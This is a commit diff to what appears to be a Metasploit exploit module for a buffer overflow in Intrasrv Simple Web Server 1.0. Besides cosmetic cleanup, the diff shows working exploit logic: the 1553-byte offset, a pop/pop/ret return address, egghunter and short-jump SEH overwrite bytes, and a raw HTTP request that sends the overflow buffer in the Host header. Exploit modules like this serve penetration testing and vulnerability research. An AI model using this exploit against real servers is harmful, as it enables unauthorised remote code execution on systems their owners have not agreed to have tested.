Do final cleanup on intrasrv_bof

2013-08-12 22:24:39 -05:00 · 2013-08-12 22:24:39 -05:00 · 7981601eb8
parent db78ffcc46
commit 7981601eb8
1 changed files with 16 additions and 16 deletions
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@ -17,17 +17,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => "Intrasrv 1.0 Buffer Overflow",
 			'Description'    => %q{
-					This module exploits a boundary condition error in Intrasrv Simple Web
-					Server 1.0. The web interface does not validate the boundaries of an
-					HTTP request string prior to copying the data to an insufficiently large
-					buffer. Successful exploitation leads to arbitrary remote code execution
-					in the context of the application.
+				This module exploits a boundary condition error in Intrasrv Simple Web
+				Server 1.0. The web interface does not validate the boundaries of an
+				HTTP request string prior to copying the data to an insufficiently large
+				buffer. Successful exploitation leads to arbitrary remote code execution
+				in the context of the application.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'xis_one@STM Solutions',  #Discovery, PoC
-					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
+					'xis_one', # Discovery, PoC
+					'PsychoSpy <neinwechter[at]gmail.com>' # Metasploit
 				],
 			'References'     =>
 				[
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					['v1.0 - XP/2003/Win7',
+					['v1.0 - XP / Win7',
 						{
 							'Offset' => 1553,
 							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
@ -85,15 +85,15 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum=>true
-			})
+			:checksum=>true
+		})

 		# setup buffer
-		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
-		buf << hunter						# egghunter
-		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
-		buf << "\xeb\x80" + rand_text(2)			# nseh - jmp -128 to egghunter
-		buf << [target.ret].pack("V*") 				# seh
+		buf = rand_text(target['Offset']-126)         # junk to egghunter at jmp -128
+		buf << hunter                                 # egghunter
+		buf << rand_text(target['Offset']-buf.length) # more junk to offset
+		buf << "\xeb\x80" + rand_text(2)              # nseh - jmp -128 to egghunter
+		buf << [target.ret].pack("V*")                # seh

 		# second last byte of payload/egg gets corrupted - pad 2 bytes
 		# so we don't corrupt the actual payload
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# instead of HttpClient here to maximize control over what's sent.
 		# (i.e. no additional headers to mess with the stack)
 		connect
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}")
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n\r\n#{egg}\r\n\r\n")
 		disconnect
 	end
 end